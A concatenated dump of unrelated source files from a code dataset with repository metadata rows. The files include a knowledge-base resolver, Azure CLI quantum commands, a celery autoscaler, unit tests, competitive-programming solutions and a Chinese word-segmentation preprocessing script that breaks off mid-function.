] | permissive | reynoldsm88/Hume | ec99df21e9b9651ec3cacfb8655a510ba567abc9 | 79a4ae3b116fbf7c9428e75a651753833e5bc137 | refs/heads/master | 2020-07-24T21:28:39.709145 | 2019-07-10T15:43:24 | 2019-07-10T15:43:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,032 | py |
from knowledge_base import KnowledgeBase
from kb_resolver import KBResolver
from utilities.awake_db import AwakeDB
class ExternalURIResolver(KBResolver):
def __init__(Self):
pass
def resolve(self, kb, awake_db):
print "ExternalURIResolver RESOLVE"
resolved_kb = KnowledgeBase()
super(ExternalURIResolver, self).copy_all(resolved_kb, kb)
if awake_db == "NA":
return resolved_kb
kb_entity_to_entity_group = dict()
for entgroupid, kb_entity_group in resolved_kb.get_entity_groups():
for kb_entity in kb_entity_group.members:
kb_entity_to_entity_group[kb_entity] = kb_entity_group
AwakeDB.initialize_awake_db(awake_db)
for entid, kb_entity in resolved_kb.entid_to_kb_entity.iteritems():
kb_entity_group = kb_entity_to_entity_group[kb_entity]
source_string = AwakeDB.get_source_string(kb_entity_group.actor_id)
if source_string is not None and source_string.find("dbpedia.org") != -1:
formatted_string = source_string.strip()
if source_string.startswith("<"):
source_string = source_string[1:]
if source_string.endswith(">"):
source_string = source_string[0:-1]
source_string = source_string.replace("dbpedia.org/resource", "en.wikipedia.org/wiki", 1)
kb_entity.properties["external_uri"] = source_string
# For countries, add geoname_id to properties
if (kb_entity_group.actor_id is not None
and "external_uri" not in kb_entity.properties
and "geonameid" not in kb_entity.properties):
geonameid = AwakeDB.get_geonameid_from_actorid(kb_entity_group.actor_id)
if geonameid is not None and len(str(geonameid).strip()) != 0:
kb_entity.properties["geonameid"] = str(geonameid)
return resolved_kb
| [
"[email protected]"
] | |
be3e5ac6319e9a7c5be95767c07575e031faad4e | 06f7ffdae684ac3cc258c45c3daabce98243f64f | /vsts/vsts/service_endpoint/v4_1/models/__init__.py | 47ad6d9342d71732fff5ee083b4be1aa50f569bb | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | kenkuo/azure-devops-python-api | 7dbfb35f1c9637c9db10207824dd535c4d6861e8 | 9ac38a97a06ee9e0ee56530de170154f6ed39c98 | refs/heads/master | 2020-04-03T17:47:29.526104 | 2018-10-25T17:46:09 | 2018-10-25T17:46:09 | 155,459,045 | 0 | 0 | MIT | 2018-10-30T21:32:43 | 2018-10-30T21:32:42 | null | UTF-8 | Python | false | false | 3,189 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from .authentication_scheme_reference import AuthenticationSchemeReference
from .authorization_header import AuthorizationHeader
from .client_certificate import ClientCertificate
from .data_source import DataSource
from .data_source_binding import DataSourceBinding
from .data_source_binding_base import DataSourceBindingBase
from .data_source_details import DataSourceDetails
from .dependency_binding import DependencyBinding
from .dependency_data import DependencyData
from .depends_on import DependsOn
from .endpoint_authorization import EndpointAuthorization
from .endpoint_url import EndpointUrl
from .graph_subject_base import GraphSubjectBase
from .help_link import HelpLink
from .identity_ref import IdentityRef
from .input_descriptor import InputDescriptor
from .input_validation import InputValidation
from .input_value import InputValue
from .input_values import InputValues
from .input_values_error import InputValuesError
from .reference_links import ReferenceLinks
from .result_transformation_details import ResultTransformationDetails
from .service_endpoint import ServiceEndpoint
from .service_endpoint_authentication_scheme import ServiceEndpointAuthenticationScheme
from .service_endpoint_details import ServiceEndpointDetails
from .service_endpoint_execution_data import ServiceEndpointExecutionData
from .service_endpoint_execution_owner import ServiceEndpointExecutionOwner
from .service_endpoint_execution_record import ServiceEndpointExecutionRecord
from .service_endpoint_execution_records_input import ServiceEndpointExecutionRecordsInput
from .service_endpoint_request import ServiceEndpointRequest
from .service_endpoint_request_result import ServiceEndpointRequestResult
from .service_endpoint_type import ServiceEndpointType
__all__ = [
'AuthenticationSchemeReference',
'AuthorizationHeader',
'ClientCertificate',
'DataSource',
'DataSourceBinding',
'DataSourceBindingBase',
'DataSourceDetails',
'DependencyBinding',
'DependencyData',
'DependsOn',
'EndpointAuthorization',
'EndpointUrl',
'GraphSubjectBase',
'HelpLink',
'IdentityRef',
'InputDescriptor',
'InputValidation',
'InputValue',
'InputValues',
'InputValuesError',
'ReferenceLinks',
'ResultTransformationDetails',
'ServiceEndpoint',
'ServiceEndpointAuthenticationScheme',
'ServiceEndpointDetails',
'ServiceEndpointExecutionData',
'ServiceEndpointExecutionOwner',
'ServiceEndpointExecutionRecord',
'ServiceEndpointExecutionRecordsInput',
'ServiceEndpointRequest',
'ServiceEndpointRequestResult',
'ServiceEndpointType',
]
| [
"[email protected]"
] | |
0c0bbbb50d63c87813b656441d38ee608227be9a | 8b7778d3c65f3688105e43718152da2c734ffa26 | /3.Application_Test/cases/YBJZ_Test/Pay_Test.py | 1fa5b3afab9534fdabc988bd759629709f20a863 | [] | no_license | zzworkaccount/OpenSourceLibrary | ab49b3f431c0474723dfad966ca09e29b07527eb | 0f99f881eb8a1f4ddebbc5e7676289d01e6ffe19 | refs/heads/main | 2023-01-29T05:02:56.341004 | 2020-12-03T12:05:59 | 2020-12-03T12:05:59 | 315,920,584 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | # 支出
import unittest
from time import sleep
from lib.Tally.Action import Action
class Test_Pay(unittest.TestCase):
def setUp(self):
self.lg = Action()
self.driver = self.lg.driver
def test_pay(self):
"""Expense (payment)"""
self.lg.do_pay()
sleep(1)
count = 0
# Get the text information shown after the payment is completed
pay_text = self.driver.find_element_by_xpath\
('(//*/android.widget.LinearLayout[2]/android.widget.LinearLayout/'
'android.widget.LinearLayout/android.widget.FrameLayout/'
'android.widget.LinearLayout/android.widget.TextView[1])').text
num_text = self.driver.find_element_by_xpath\
('(//*/android.widget.LinearLayout[2]/android.widget.LinearLayout/'
'android.widget.LinearLayout/android.widget.FrameLayout/'
'android.widget.LinearLayout/android.widget.TextView[2])').text
expect = 1
if '餐饮' in pay_text and '-520' == num_text:  # '餐饮' is the "Catering/Food" category label
count += 1
# Assertion
# using the assertion method provided by the test framework
self.assertEqual(count, expect)
| [
"[email protected]"
] | |
9552995971c569ff4f8f6eca60a9625ec1a652e2 | 3bae1ed6460064f997264091aca0f37ac31c1a77 | /pyapps/sampleapp/impl/action/core/job/getXMLSchema/1_job_getXMLSchema.py | 02e7f9e335610b4d5303567e07cd2003e0de3f8c | [] | no_license | racktivity/ext-pylabs-core | 04d96b80ac1942754257d59e91460c3a141f0a32 | 53d349fa6bee0ccead29afd6676979b44c109a61 | refs/heads/master | 2021-01-22T10:33:18.523799 | 2017-06-08T09:09:28 | 2017-06-08T09:09:28 | 54,314,984 | 0 | 0 | null | 2017-06-08T09:09:29 | 2016-03-20T11:55:01 | Python | UTF-8 | Python | false | false | 147 | py | __author__ = 'incubaid'
__priority__= 3
def main(q, i, p, params, tags):
params['result'] = ''
def match(q, i, params, tags):
return True | [
"devnull@localhost"
] | devnull@localhost |
fe4a67605c3ed774089ea1c726953328a7291e58 | 15581a76b36eab6062e71d4e5641cdfaf768b697 | /LeetCode_30days_challenge/2020/May/First Bad Version.py | 714967601f2406326187fa685495ac2b041efcf6 | [] | no_license | MarianDanaila/Competitive-Programming | dd61298cc02ca3556ebc3394e8d635b57f58b4d2 | 3c5a662e931a5aa1934fba74b249bce65a5d75e2 | refs/heads/master | 2023-05-25T20:03:18.468713 | 2023-05-16T21:45:08 | 2023-05-16T21:45:08 | 254,296,597 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 206 | py | def firstBadVersion(n):
l = 0
r = n
while l <= r:
m = l + (r-l) // 2
if isBadVersion(m):
r = m-1
ans = m
else:
l = m+1
return ans
| [
"[email protected]"
] | |
891d0fcc191ad040194c3b84a530df3f83a981ab | c36679186f669c6e3bd1c106c96d4a17be1f5ab1 | /Practice_Anisul/6.py | d7f168fd320b4f1b12435bd0fe54fd71dcb8f103 | [] | no_license | touhiduzzaman-tuhin/python-code-university-life | 60a3d671b200a6f5222c6d176c13c5f20f013509 | 6d2e3d90d430faa5c83fe79e7fb1ebe516994762 | refs/heads/master | 2023-03-22T15:18:10.636203 | 2021-03-06T18:52:04 | 2021-03-06T18:52:04 | 332,467,190 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | x = "Tuhin"
print(x)
x = 'Tuhin'
print(x)
x = "\"Tuhin\""
print(x)
x = "\'Tuhin\'"
print(x)
x = "\"Tuhin\'"
print(x) | [
"[email protected]"
] | |
48a0486d3ecc70762a4a94e5d1b121b090b5cb54 | 7357d367b0af4650ccc5b783b7a59090fdde47bb | /workalendar/usa/new_jersey.py | 9bd916ca02e66d3026491150081c6ec359dc4184 | [
"MIT"
] | permissive | BarracudaPff/code-golf-data-python | fb0cfc74d1777c4246d56a5db8525432bf37ab1a | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | refs/heads/main | 2023-05-29T05:52:22.856551 | 2020-05-23T22:12:48 | 2020-05-23T22:12:48 | 378,832,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from __future__ import absolute_import, division, print_function, unicode_literals
from ..registry_tools import iso_register
from .core import UnitedStates
@iso_register("US-NJ")
class NewJersey(UnitedStates):
"""New Jersey"""
include_good_friday = True
include_election_day_every_year = True | [
"[email protected]"
] | |
85680cb8d5a23c4dd6047fa67e2115f85b2e1ca1 | ca17bd80ac1d02c711423ac4093330172002a513 | /find_leaves/FindLeaves.py | abce20d217199c2a3c79ac375c09f9dd3dcd5f44 | [] | no_license | Omega094/lc_practice | 64046dea8bbdaee99d767b70002a2b5b56313112 | e61776bcfd5d93c663b247d71e00f1b298683714 | refs/heads/master | 2020-03-12T13:45:13.988645 | 2018-04-23T06:28:32 | 2018-04-23T06:28:32 | 130,649,699 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,461 | py | import sys
sys.path.append("/Users/jinzhao/leetcode/")
from leetcode.common import *
class Solution(object):
def isLeaf(self, root):
if root:
return not root.left and not root.right
return False
def deleteLeaf(self, root, solution):
if root:
if root.left:
if self.isLeaf(root.left):
solution.append(root.left.val)
root.left = None
else:
self.deleteLeaf(root.left, solution)
if root.right:
if self.isLeaf(root.right):
solution.append(root.right.val)
root.right = None
else:
self.deleteLeaf(root.right, solution)
return solution
def findLeaves(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
parent = TreeNode(0)
parent.right = root
solutionList = []
while parent.right:
#The line below could be removed for submission.
pretty_print_tree(parent.right, [])
solution = self.deleteLeaf(parent,[] )
if solution :
solutionList.append(solution)
return solutionList
if __name__ == "__main__":
sol = Solution()
root = build_tree_by_level([1,2,3,4,5,6,7])
#pretty_print_tree(root, [])
print sol.findLeaves(root)
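# For this complete tree the rounds of removed leaves are, per the logic above:
# [[4, 5, 6, 7], [2, 3], [1]]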
| [
"[email protected]"
] | |
52f0bbbdbef2c865ea39664ab4a748fe1eddfdcd | 325fde42058b2b82f8a4020048ff910cfdf737d7 | /src/quantum/azext_quantum/commands.py | 8dba4d309945625ee9a7487899150bcbc8cc9495 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | ebencarek/azure-cli-extensions | 46b0d18fe536fe5884b00d7ffa30f54c7d6887d1 | 42491b284e38f8853712a5af01836f83b04a1aa8 | refs/heads/master | 2023-04-12T00:28:44.828652 | 2021-03-30T22:34:13 | 2021-03-30T22:34:13 | 261,621,934 | 2 | 5 | MIT | 2020-10-09T18:21:52 | 2020-05-06T01:25:58 | Python | UTF-8 | Python | false | false | 5,417 | py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
from collections import OrderedDict
from azure.cli.core.commands import CliCommandType
from ._validators import validate_workspace_info, validate_target_info, validate_workspace_and_target_info, validate_workspace_info_no_location, validate_provider_and_sku_info
def transform_targets(providers):
def one(provider, target):
return OrderedDict([
('Provider', provider),
('Target-id', target['id']),
('Current Availability', target['currentAvailability']),
('Average Queue Time (seconds)', target['averageQueueTime'])
])
return [
one(provider['id'], target)
for provider in providers
for target in provider['targets']
]
def transform_job(result):
result = OrderedDict([
('Name', result['name']),
('Id', result['id']),
('Status', result['status']),
('Target', result['target']),
('Submission time', result['creationTime']),
('Completion time', result['endExecutionTime'])
])
return result
def transform_jobs(results):
def creation(job):
return job['creationTime']
return [transform_job(job) for job in sorted(results, key=creation, reverse=True)]
def transform_offerings(offerings):
def one(offering):
return OrderedDict([
('Provider Id', offering['id']),
('SKUs', ', '.join([s['id'] for s in offering['properties']['skus']])),
('Publisher ID', offering['properties']['managedApplication']['publisherId']),
('Offer ID', offering['properties']['managedApplication']['offerId'])
])
return [one(offering) for offering in offerings]
def transform_output(results):
def one(key, value):
repeat = round(20 * value)
barra = "\u2588" * repeat
return OrderedDict([
('Result', key),
('Frequency', f"{value:10.8f}"),
('', f"\u2590{barra:<22} |"),
])
if 'Histogram' in results:
histogram = results['Histogram']
# In the Histogram serialization keys and values alternate (key, value, key, value, ...)
# Make sure we have an even number of entries
if (len(histogram) % 2) == 0:
table = []
items = range(0, len(histogram), 2)
for i in items:
key = histogram[i]
value = histogram[i + 1]
table.append(one(key, value))
return table
elif 'histogram' in results:
histogram = results['histogram']
return [one(key, histogram[key]) for key in histogram]
return results
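# For illustration (hypothetical values): a result of
#   {'Histogram': ['0', 0.5, '1', 0.5]}
# renders as two rows, each holding the key, the frequency formatted to eight
# decimal places, and a bar of round(20 * frequency) block characters.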
def load_command_table(self, _):
workspace_ops = CliCommandType(operations_tmpl='azext_quantum.operations.workspace#{}')
job_ops = CliCommandType(operations_tmpl='azext_quantum.operations.job#{}')
target_ops = CliCommandType(operations_tmpl='azext_quantum.operations.target#{}')
offerings_ops = CliCommandType(operations_tmpl='azext_quantum.operations.offerings#{}')
with self.command_group('quantum workspace', workspace_ops) as w:
w.command('create', 'create')
w.command('delete', 'delete', validator=validate_workspace_info_no_location)
w.command('list', 'list')
w.show_command('show', validator=validate_workspace_info_no_location)
w.command('set', 'set', validator=validate_workspace_info)
w.command('clear', 'clear')
w.command('quotas', 'quotas', validator=validate_workspace_info)
with self.command_group('quantum target', target_ops) as t:
t.command('list', 'list', validator=validate_workspace_info, table_transformer=transform_targets)
t.show_command('show', validator=validate_target_info)
t.command('set', 'set', validator=validate_target_info)
t.command('clear', 'clear')
with self.command_group('quantum job', job_ops) as j:
j.command('list', 'list', validator=validate_workspace_info, table_transformer=transform_jobs)
j.show_command('show', validator=validate_workspace_info, table_transformer=transform_job)
j.command('submit', 'submit', validator=validate_workspace_and_target_info, table_transformer=transform_job)
j.command('wait', 'wait', validator=validate_workspace_info, table_transformer=transform_job)
j.command('output', 'output', validator=validate_workspace_info, table_transformer=transform_output)
with self.command_group('quantum', job_ops, is_preview=True) as q:
q.command('run', 'run', validator=validate_workspace_and_target_info, table_transformer=transform_output)
q.command('execute', 'run', validator=validate_workspace_and_target_info, table_transformer=transform_output)
with self.command_group('quantum offerings', offerings_ops) as o:
o.command('list', 'list_offerings', table_transformer=transform_offerings)
o.command('accept-terms', 'accept_terms', validator=validate_provider_and_sku_info)
o.command('show-terms', 'show_terms', validator=validate_provider_and_sku_info)
| [
"[email protected]"
] | |
a4abde74b1d48317424e2021da5db8a2da70ee28 | 14e36010b98895e08bd9edfcbc60dce30cbfb82b | /oneflow/python/test/modules/test_argmax.py | 2f6e97661d6adf0677afe950e239b03a88c32db5 | [
"Apache-2.0"
] | permissive | duzhanyuan/oneflow | a9719befbfe112a7e2dd0361ccbd6d71012958fb | c6b47a3e4c9b5f97f5bc9f60bc1401313adc32c5 | refs/heads/master | 2023-06-21T20:31:55.828179 | 2021-07-20T16:10:02 | 2021-07-20T16:10:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,326 | py | """
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
import oneflow.experimental as flow
from test_util import GenArgList
def _test_argmax_axis_negative(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = -1
of_out = flow.argmax(input, dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_tensor_argmax(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 0
of_out = input.argmax(dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().shape, np_out.shape))
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_axis_positive(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 1
of_out = flow.argmax(input, dim=axis)
np_out = np.argmax(input.numpy(), axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_keepdims(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
axis = 0
of_out = input.argmax(axis, True)
np_out = np.argmax(input.numpy(), axis=axis)
np_out = np.expand_dims(np_out, axis=axis)
test_case.assertTrue(np.array_equal(of_out.numpy().shape, np_out.shape))
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
def _test_argmax_dim_equal_none(test_case, device):
input = flow.Tensor(
np.random.randn(2, 6, 5, 3), dtype=flow.float32, device=flow.device(device),
)
of_out = input.argmax()
np_out = np.argmax(input.numpy().flatten(), axis=0)
test_case.assertTrue(np.array_equal(of_out.numpy().flatten(), np_out.flatten()))
@flow.unittest.skip_unless_1n1d()
class TestArgmax(flow.unittest.TestCase):
def test_argmax(test_case):
arg_dict = OrderedDict()
arg_dict["test_fun"] = [
_test_argmax_axis_negative,
_test_tensor_argmax,
_test_argmax_axis_positive,
_test_argmax_keepdims,
_test_argmax_dim_equal_none,
]
arg_dict["device"] = ["cpu", "cuda"]
for arg in GenArgList(arg_dict):
arg[0](test_case, *arg[1:])
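# Note: GenArgList expands arg_dict into the cartesian product of its value
# lists (as used here), so every test function above runs once per device.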
if __name__ == "__main__":
unittest.main()
| [
"[email protected]"
] | |
aebfc07c7c0647c4cf50ffd3727a29c3a1a1bbf5 | 8dbb2a3e2286c97b1baa3ee54210189f8470eb4d | /kubernetes-stubs/client/models/v1_portworx_volume_source.pyi | b25062ce2dce6c1b5d1c6d991321863933c2432c | [] | no_license | foodpairing/kubernetes-stubs | e4b0f687254316e6f2954bacaa69ff898a88bde4 | f510dc3d350ec998787f543a280dd619449b5445 | refs/heads/master | 2023-08-21T21:00:54.485923 | 2021-08-25T03:53:07 | 2021-08-25T04:45:17 | 414,555,568 | 0 | 0 | null | 2021-10-07T10:26:08 | 2021-10-07T10:26:08 | null | UTF-8 | Python | false | false | 565 | pyi | import datetime
import typing
import kubernetes.client
class V1PortworxVolumeSource:
fs_type: typing.Optional[str]
read_only: typing.Optional[bool]
volume_id: str
def __init__(
self,
*,
fs_type: typing.Optional[str] = ...,
read_only: typing.Optional[bool] = ...,
volume_id: str
) -> None: ...
def to_dict(self) -> V1PortworxVolumeSourceDict: ...
class V1PortworxVolumeSourceDict(typing.TypedDict, total=False):
fsType: typing.Optional[str]
readOnly: typing.Optional[bool]
volumeID: str
| [
"[email protected]"
] | |
949ad3a1372e9c39832994758556504087695f10 | 2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac | /Dsz/PyScripts/Lib/dsz/mca/survey/cmd/registryquery/__init__.py | 83cc81184494f05024215cd8ec32607526a0ff9d | [] | no_license | FingerLeakers/DanderSpritz_docs | f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364 | d96b6a71c039b329f9f81544f645857c75360e7f | refs/heads/master | 2021-01-25T13:05:51.732149 | 2018-03-08T01:22:49 | 2018-03-08T01:22:49 | 123,527,268 | 2 | 0 | null | 2018-03-02T03:48:31 | 2018-03-02T03:48:30 | null | UTF-8 | Python | false | false | 362 | py | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: __init__.py
from errors import *
from types import *
from type_Params import *
from type_KeyInfo import *
from type_Subkey import *
from type_Value import * | [
"[email protected]"
] | |
1e749a5b71a5aaeafceab5a016ab8fc7637dfd16 | 8d5c9369b0fb398c5a6078f6cac43ba8d67202fa | /bscan.spec | 279792b27d524a1ad2c5efe84281796470e6b245 | [
"MIT"
] | permissive | raystyle/bscan | 45191c2c0d26fe450c5d95567b83d47dfcb4c692 | 1edf0c0e738153a294d5cdc1b69d8f167152d5a2 | refs/heads/master | 2020-04-25T03:15:37.186913 | 2019-02-09T22:23:44 | 2019-02-09T22:23:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 724 | spec | # -*- mode: python -*-
block_cipher = None
added_files = [
('bscan/configuration/', 'configuration',),
]
a = Analysis(
['bscan/__main__.py'],
binaries=[],
datas=added_files,
hiddenimports=[],
hookspath=[],
runtime_hooks=[],
excludes=[],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher,
noarchive=False
)
pyz = PYZ(
a.pure,
a.zipped_data,
cipher=block_cipher
)
exe = EXE(
pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
[],
name='bscan',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
runtime_tmpdir=None,
console=True,
icon='static/app.ico'
)
| [
"[email protected]"
] | |
56537f73c96e020a0161b300e33f26b648a28147 | 943dca755b940493a8452223cfe5daa2fb4908eb | /abc161/c.py | 58a67245e18e4e88e54cf22d9cc45d994a59cc51 | [] | no_license | ymsk-sky/atcoder | 5e34556582763b7095a5f3a7bae18cbe5b2696b2 | 36d7841b70b521bee853cdd6d670f8e283d83e8d | refs/heads/master | 2023-08-20T01:34:16.323870 | 2023-08-13T04:49:12 | 2023-08-13T04:49:12 | 254,348,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | n,k=map(int,input().split())
if n<k: print(min(n,abs(n-k)))
elif n==k or k==1: print(0)
else: print(min(n,abs(n-(n//k+1)*k)))
| [
"[email protected]"
] | |
e16d5a370589fd4fcb8ab0377701d48a1d1d0853 | e21c70d5b03633b4e0a89dfccb0cb8ccd88612d0 | /venv/lib/python3.5/site-packages/celery/worker/autoscale.py | e21f73a0b61f250f23f6950d29d8adb767250aa1 | [
"MIT"
] | permissive | LavanyaRamkumar/Networking-app_Dynamic-Quiz | 4d5540088b1e2724626dda8df0fd83442391b40f | 4de8329845712864d3cc8e8b81cfce5a1207224d | refs/heads/master | 2023-02-09T12:08:19.913354 | 2019-10-26T04:23:54 | 2019-10-26T04:23:54 | 173,337,916 | 1 | 1 | MIT | 2023-02-02T04:48:55 | 2019-03-01T16:56:13 | Python | UTF-8 | Python | false | false | 4,883 | py | # -*- coding: utf-8 -*-
"""Pool Autoscaling.
This module implements the internal thread responsible
for growing and shrinking the pool according to the
current autoscale settings.
The autoscale thread is only enabled if
the :option:`celery worker --autoscale` option is used.
"""
from __future__ import absolute_import, unicode_literals
import os
import threading
from time import sleep
from kombu.async.semaphore import DummyLock
from celery import bootsteps
from celery.five import monotonic
from celery.utils.log import get_logger
from celery.utils.threads import bgThread
from . import state
from .components import Pool
__all__ = ['Autoscaler', 'WorkerComponent']
logger = get_logger(__name__)
debug, info, error = logger.debug, logger.info, logger.error
AUTOSCALE_KEEPALIVE = float(os.environ.get('AUTOSCALE_KEEPALIVE', 30))
class WorkerComponent(bootsteps.StartStopStep):
"""Bootstep that starts the autoscaler thread/timer in the worker."""
label = 'Autoscaler'
conditional = True
requires = (Pool,)
def __init__(self, w, **kwargs):
self.enabled = w.autoscale
w.autoscaler = None
def create(self, w):
scaler = w.autoscaler = self.instantiate(
w.autoscaler_cls,
w.pool, w.max_concurrency, w.min_concurrency,
worker=w, mutex=DummyLock() if w.use_eventloop else None,
)
return scaler if not w.use_eventloop else None
def register_with_event_loop(self, w, hub):
w.consumer.on_task_message.add(w.autoscaler.maybe_scale)
hub.call_repeatedly(
w.autoscaler.keepalive, w.autoscaler.maybe_scale,
)
class Autoscaler(bgThread):
"""Background thread to autoscale pool workers."""
def __init__(self, pool, max_concurrency,
min_concurrency=0, worker=None,
keepalive=AUTOSCALE_KEEPALIVE, mutex=None):
super(Autoscaler, self).__init__()
self.pool = pool
self.mutex = mutex or threading.Lock()
self.max_concurrency = max_concurrency
self.min_concurrency = min_concurrency
self.keepalive = keepalive
self._last_scale_up = None
self.worker = worker
assert self.keepalive, 'cannot scale down too fast.'
def body(self):
with self.mutex:
self.maybe_scale()
sleep(1.0)
def _maybe_scale(self, req=None):
procs = self.processes
cur = min(self.qty, self.max_concurrency)
if cur > procs:
self.scale_up(cur - procs)
return True
cur = max(self.qty, self.min_concurrency)
if cur < procs:
self.scale_down(procs - cur)
return True
def maybe_scale(self, req=None):
if self._maybe_scale(req):
self.pool.maintain_pool()
def update(self, max=None, min=None):
with self.mutex:
if max is not None:
if max < self.processes:
self._shrink(self.processes - max)
self.max_concurrency = max
if min is not None:
if min > self.processes:
self._grow(min - self.processes)
self.min_concurrency = min
return self.max_concurrency, self.min_concurrency
def force_scale_up(self, n):
with self.mutex:
new = self.processes + n
if new > self.max_concurrency:
self.max_concurrency = new
self._grow(n)
def force_scale_down(self, n):
with self.mutex:
new = self.processes - n
if new < self.min_concurrency:
self.min_concurrency = max(new, 0)
self._shrink(min(n, self.processes))
def scale_up(self, n):
self._last_scale_up = monotonic()
return self._grow(n)
def scale_down(self, n):
if self._last_scale_up and (
monotonic() - self._last_scale_up > self.keepalive):
return self._shrink(n)
def _grow(self, n):
info('Scaling up %s processes.', n)
self.pool.grow(n)
self.worker.consumer._update_prefetch_count(n)
def _shrink(self, n):
info('Scaling down %s processes.', n)
try:
self.pool.shrink(n)
except ValueError:
debug("Autoscaler won't scale down: all processes busy.")
except Exception as exc:
error('Autoscaler: scale_down: %r', exc, exc_info=True)
self.worker.consumer._update_prefetch_count(-n)
def info(self):
return {
'max': self.max_concurrency,
'min': self.min_concurrency,
'current': self.processes,
'qty': self.qty,
}
@property
def qty(self):
return len(state.reserved_requests)
@property
def processes(self):
return self.pool.num_processes
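# Usage note (not part of this module): the autoscaler is enabled from the
# worker command line, e.g.
#   celery -A proj worker --autoscale=10,3
# where `proj` is a placeholder app name, 10 is max_concurrency and 3 is
# min_concurrency, matching Autoscaler(pool, max_concurrency, min_concurrency).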
| [
"[email protected]"
] | |
466965dcbb3fd44bda5de7f81e42d31ae7e715c4 | c5a360ae82b747307b94720e79e2e614d0c9f70f | /step2_process_data_format_by_keras.py | 818e00fc1f1b23a04f91efd4f4c676aa8a55aca4 | [] | no_license | gswyhq/chinese_wordseg_keras | cf99156773d4555acddf3163457f9bc224a16477 | 7f1de5fb1e3372fac9df75d3d839aa92fa4601c9 | refs/heads/master | 2020-05-02T13:49:32.099129 | 2019-03-28T14:07:46 | 2019-03-28T14:11:49 | 177,993,542 | 0 | 0 | null | 2019-03-27T12:49:37 | 2019-03-27T12:49:37 | null | UTF-8 | Python | false | false | 4,090 | py | #!/usr/bin/python3
# coding=utf-8
# ### 基于深度学习的中文分词尝试
# - 基于word2vec + 神经网络进行中文分词
# - 步骤1:使用的是sogou的语料库建立初始的字向量。
# - 步骤2:读入有标注的训练语料库,处理成keras需要的数据格式。
# - 步骤3:根据训练数据建模,使用CNN方法
# - 步骤4:读入无标注的检验语料库,用CNN模型进行分词标注
# - 步骤5:检查最终的效果
# - 参考资料:[中文分词资源](http://www.52nlp.cn/%E4%B8%AD%E6%96%87%E5%88%86%E8%AF%8D%E5%85%A5%E9%97%A8%E4%B9%8B%E8%B5%84%E6%BA%90)
# [中文分词标注法](http://www.52nlp.cn/the-character-based-tagging-method-of-chinese-word-segmentation) [word2vec原理](http://suanfazu.com/t/word2vec-zhong-de-shu-xue-yuan-li-xiang-jie-duo-tu-wifixia-yue-du/178) [基于word2vec的中文分词](http://blog.csdn.net/itplus/article/details/17122431)
# - 步骤1:先用sogou语料库生成中文的单字向量,以备后用
import codecs
import numpy as np
from pickle import dump,load
# - 步骤2:训练数据读取和转换
init_weight_wv= load(open('init_weight.pickle','rb'))
word2idx = load(open('word2idx.pickle', 'rb'))
idx2word = load(open('idx2word.pickle', 'rb'))
# 读取数据,将格式进行转换为带四种标签 S B M E
input_file = './data/icwb2-data/training/msr_training.utf8'
output_file = './data/icwb2-data/training/msr_training.tagging.utf8'
# 用于字符标记的4个标签:B(开始),E(结束),M(中),S(单)
def character_tagging(input_file, output_file):
input_data = codecs.open(input_file, 'r', 'utf-8')
output_data = codecs.open(output_file, 'w', 'utf-8')
for line in input_data.readlines():
word_list = line.strip().split()
for word in word_list:
if len(word) == 1:
output_data.write(word + "/S ")
else:
output_data.write(word[0] + "/B ")
for w in word[1:len(word)-1]:
output_data.write(w + "/M ")
